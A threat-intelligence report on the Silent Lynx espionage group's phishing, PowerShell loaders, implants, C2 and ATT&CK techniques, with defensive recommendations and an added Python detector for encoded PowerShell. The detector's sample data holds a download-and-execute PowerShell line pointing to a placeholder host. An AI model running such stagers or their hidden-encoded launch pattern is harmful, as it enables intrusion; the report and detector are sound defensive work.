Silent Lynx, an Advanced Persistent Threat (APT) group also known as YoroTrooper, Sturgeon Phisher, Cavalry Werewolf, and ShadowSilk, has been conducting sophisticated espionage campaigns across Central Asia since late 2024. The threat actor targets government entities, diplomatic missions, think-tanks, financial institutions, mining companies, and transport and communications infrastructure primarily in Tajikistan, Kazakhstan, Kyrgyzstan, Turkmenistan, and Uzbekistan, with additional activity observed in Russia, Azerbaijan, and China.
Operating under the campaign designation “Operation Peek-a-Baku,” Silent Lynx leverages phishing campaigns themed around regional diplomatic summits and strategic cooperation meetings to deliver malicious RAR or ZIP attachments containing LNK shortcuts or ISO files. These attachments deploy PowerShell-based loaders and custom implants including Silent Loader, LAPLAS, and SilentSweeper malware variants. The APT group utilizes legitimate services such as GitHub for payload hosting, Ligolo-ng for encrypted tunneling, and Telegram bots for command-and-control operations, effectively blending malicious traffic with normal network activity. Attribution analysis suggests the threat actor may operate from Kazakhstan, with significant operational overlaps with the YoroTrooper espionage group indicating potential shared resources or collaboration between these Advanced Persistent Threat entities.
Silent Lynx represents an Advanced Persistent Threat group conducting cyber-espionage campaigns across Central Asia since late 2024, with primary focus on governmental, diplomatic, financial, and strategic infrastructure sectors. The Operation Peek-a-Baku campaign specifically targets intelligence collection related to sensitive political and economic matters, particularly information concerning regional initiatives under the UN Special Programme for the Economies of Central Asia (SPECA). Attribution analysis points to Kazakhstan as the potential operational base for this APT group, with significant tooling and objective overlaps observed with the YoroTrooper espionage group, suggesting either shared resources or direct collaboration between these Advanced Persistent Threat actors.
The threat actor’s targeting methodology demonstrates high selectivity aligned with key geopolitical events affecting Central Asia. Silent Lynx crafts phishing lures referencing diplomatic summits and strategic cooperation meetings in major regional capitals including Dushanbe, Astana, and Baku. Email attachments are themed around policy discussions and infrastructure development topics such as mining operations and transport corridors, including specific references to the China-Tajikistan Highway project. These spear-phishing campaigns utilize RAR or ZIP compressed archives containing malicious LNK shortcuts or ISO files designed to deliver PowerShell stagers concealed behind decoy documents. While the social-engineering content maintains contextual relevance to regional affairs, language inconsistencies in filenames suggest either automated generation or non-native Russian language proficiency among the APT operators.
Silent Lynx employs a sophisticated multi-stage infection chain combining custom malware with open-source utilities to establish persistent access to compromised systems. The attack sequence initiates with an LNK shortcut that executes a Base64-encoded PowerShell script hosted on GitHub repositories, which subsequently downloads and executes malicious implants. The APT group’s custom malware arsenal includes Silent Loader, a C++ loader deploying PowerShell payloads; LAPLAS, a C++ reverse shell utilizing TCP/TLS protocols for encrypted communications; and SilentSweeper, a .NET implant providing remote access capabilities. To maintain persistent access and conceal command-and-control activity, Silent Lynx leverages Ligolo-ng, an open-source tunneling tool that enables encrypted command and data traffic to flow through compromised hosts, effectively evading traditional network detection mechanisms.
The Silent Lynx APT group maintains command-and-control infrastructure distributed across multiple countries, with C2 servers identified in Russia and the Netherlands. Certain malware variants incorporate Telegram bot functionality with hardcoded authentication tokens for issuing commands and exfiltrating sensitive data, a tactic that enhances operational stealth by leveraging legitimate messaging platforms but has also exposed operational details during security analysis. The threat actor demonstrates moderate technical capability characterized by persistent reuse of infrastructure elements, reliance on open-source tooling, and encoding techniques that balance implementation simplicity with effectiveness against conventional security defenses. This operational pattern indicates an APT group prioritizing sustained intelligence collection over advanced evasion, with ongoing activity suggesting continued focus on Central Asian geopolitical and economic intelligence gathering.
Organizations should enforce PowerShell Constrained Language Mode for non-administrator users to limit script execution capabilities and prevent the PowerShell-based attacks commonly employed by the Silent Lynx APT group. Enable PowerShell Module Logging (Event ID 4103) and Script Block Logging (Event ID 4104), which record detailed information about encoded commands and script execution. This logging is essential for detecting the Base64-encoded PowerShell commands used in Silent Lynx infection chains and provides critical forensic evidence for incident response investigations.
Configure email gateway security controls to quarantine RAR archives, ISO disk images, and LNK shortcut files, which represent the primary delivery mechanisms for Silent Lynx phishing campaigns targeting Central Asian organizations. Implement sandbox detonation technology to analyze compressed or password-protected archives in isolated environments before delivery to end users. This preventive measure effectively neutralizes the initial access vector employed by the APT group while minimizing disruption to legitimate business communications.
Deploy detection mechanisms to identify suspicious powershell.exe process instances utilizing command-line arguments such as -EncodedCommand, -nop (NoProfile), or -w hidden (WindowStyle hidden). Configure security monitoring to generate alerts when PowerShell execution chains originate from parent processes including explorer.exe, winword.exe, or Outlook-related processes, as these represent common indicators of malicious LNK or document-based exploitation. This behavioral detection approach enables early identification of Silent Lynx infection attempts during the initial execution phase.
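As an added example (not from the report or any vendor product), the behavioral rule described in the two PowerShell recommendations above run over constructed process-creation events: it flags powershell.exe launched from explorer.exe, winword.exe or Outlook with -nop, -w hidden or -EncodedCommand, and decodes the Base64/UTF-16LE payload so the encoded command can be inspected rather than just alerted on. The ProcessEvent field names, the sample events and the placeholder GitHub URL are all constructed.

```python
import base64
import re
from collections import namedtuple

# Parent processes the report names as typical launchers of malicious PowerShell.
SUSPICIOUS_PARENTS = {"explorer.exe", "winword.exe", "outlook.exe"}
# PowerShell accepts any unambiguous prefix of a switch, so -e/-ec/-enc all mean
# -EncodedCommand, -nop means -NoProfile and -w hidden means -WindowStyle Hidden.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})")
NOPROFILE_RE = re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?(?=\s|$)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden(?=\s|$)")
GITHUB_RAW_RE = re.compile(r"(?i)https?://raw\.githubusercontent\.com/")

# Minimal view of a process-creation record (Sysmon Event 1 / Security 4688); constructed.
ProcessEvent = namedtuple("ProcessEvent", "parent_image image command_line")


def decode_encoded_command(b64: str) -> str:
    # -EncodedCommand carries Base64 of UTF-16LE text, not UTF-8.
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def evaluate(event: ProcessEvent) -> dict:
    """Return the indicators that fire for one event; 'alert' is True if any do."""
    result = {"alert": False, "indicators": [], "decoded_command": None}
    if event.image.rsplit("\\", 1)[-1].lower() not in ("powershell.exe", "pwsh.exe"):
        return result
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        result["indicators"].append("parent:" + parent)
    for name, rx in (("noprofile", NOPROFILE_RE), ("window-hidden", HIDDEN_RE)):
        if rx.search(event.command_line):
            result["indicators"].append(name)
    match = ENCODED_RE.search(event.command_line)
    if match:  # decode so the analyst sees the real command, not the Base64 blob
        result["decoded_command"] = decode_encoded_command(match.group(1))
        result["indicators"].append("encoded-command")
        if GITHUB_RAW_RE.search(result["decoded_command"]):
            result["indicators"].append("github-raw-url")
    result["alert"] = bool(result["indicators"])
    return result


# Constructed sample events; the encoded payload is generated here, not captured.
CONSTRUCTED_STAGE = "iex (iwr 'https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/loader.ps1')"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\services.exe", PS_EXE,
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_EXE, "powershell.exe -nop -w hidden -enc "
                 + base64.b64encode(CONSTRUCTED_STAGE.encode("utf-16-le")).decode()),
]
```

The benign scheduled-script launch yields no indicators, while the explorer.exe-spawned encoded launch fires all five; a 4104 script block record for the same session would show the decoded text directly.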
Block network communications to known Silent Lynx command-and-control IP addresses and malicious domains identified in threat intelligence. Deploy detection capabilities to identify outbound connections to GitHub raw content URLs used as payload hosting infrastructure by the APT group. Monitor network traffic for Ligolo-ng tunneling behavior, characterized by unusual, persistent TLS or TCP connections to unfamiliar IP addresses on non-standard ports. This network-layer defense provides visibility into command-and-control communications and data exfiltration attempts associated with Silent Lynx operations.
Implement Windows AppLocker or Windows Defender Application Control (WDAC) policies to prevent execution of unauthorized binaries and scripts from user-writable directories. Application allowlisting provides robust protection against Silent Loader, LAPLAS, and SilentSweeper malware variants by blocking execution of malicious implants deployed during Silent Lynx attack sequences. This preventive control significantly reduces the attack surface available to Advanced Persistent Threat groups targeting Windows-based infrastructure.
The following IP addresses represent command-and-control infrastructure utilized by the Silent Lynx APT group in Operation Peek-a-Baku espionage campaigns:
Silent Lynx command-and-control operations leverage the following domain names masquerading as legitimate Microsoft update services:
Active payload distribution infrastructure identified in Silent Lynx campaigns:
The following SHA256 hashes correspond to Silent Loader, LAPLAS, SilentSweeper malware variants, malicious LNK shortcuts, PowerShell loaders, and associated files utilized in Silent Lynx APT operations:
Silent Lynx APT operations employ Initial Access tactics including Phishing (T1566) and specifically Spearphishing Attachment (T1566.001) to deliver malicious RAR and ZIP archives containing malware to target organizations. The threat actor utilizes User Execution (T1204) techniques requiring victims to interact with malicious files, followed by execution through Command and Scripting Interpreter (T1059) methods including PowerShell (T1059.001) and Visual Basic (T1059.005) scripting languages to establish initial footholds in compromised environments.
The APT group establishes persistence through Boot or Logon Autostart Execution (T1547) mechanisms, specifically leveraging Shortcut Modification (T1547.009) techniques to maintain access across system reboots. Silent Lynx also employs Scheduled Task/Job (T1053) creation, including Scheduled Task (T1053.005) implementations, to ensure persistent execution of malicious payloads and maintain long-term access to compromised Central Asian infrastructure.
Silent Lynx demonstrates sophisticated Defense Evasion capabilities through Obfuscated Files or Information (T1027) techniques, specifically utilizing Encrypted/Encoded File (T1027.013) methods to conceal malicious PowerShell scripts and payloads. The threat actor implements Masquerading (T1036) techniques to disguise malicious files and processes as legitimate system components, reducing detection probability by security monitoring tools deployed in target environments.
The APT group maintains command-and-control communications through Application Layer Protocol (T1071) methods, specifically Web Protocols (T1071.001) for HTTP/HTTPS-based communications. Silent Lynx utilizes Protocol Tunneling (T1572) via Ligolo-ng to encrypt command traffic and employs Proxy (T1090) techniques to obfuscate the true origin of command-and-control communications. The group also leverages Non-Application Layer Protocol (T1095) methods for direct TCP/TLS connections established by the LAPLAS malware variant.
Silent Lynx conducts data exfiltration through Exfiltration Over C2 Channel (T1041) techniques, utilizing established command-and-control infrastructure to extract sensitive intelligence from compromised organizations. The threat actor also employs Exfiltration Over Web Service (T1567) methods, specifically leveraging Telegram messaging platform functionality embedded in certain malware variants to exfiltrate collected data while blending exfiltration traffic with legitimate communications.
The APT group demonstrates technical proficiency through Native API (T1106) utilization for low-level Windows system interactions that evade higher-level security monitoring. Silent Lynx operations involve execution of Malicious File (T1204.002) and Malicious Link (T1204.001) components delivered through phishing campaigns, representing the critical user interaction phase required for successful compromise of target systems in Central Asian espionage operations.
Report Generated: November 6, 2025
Threat Level: Red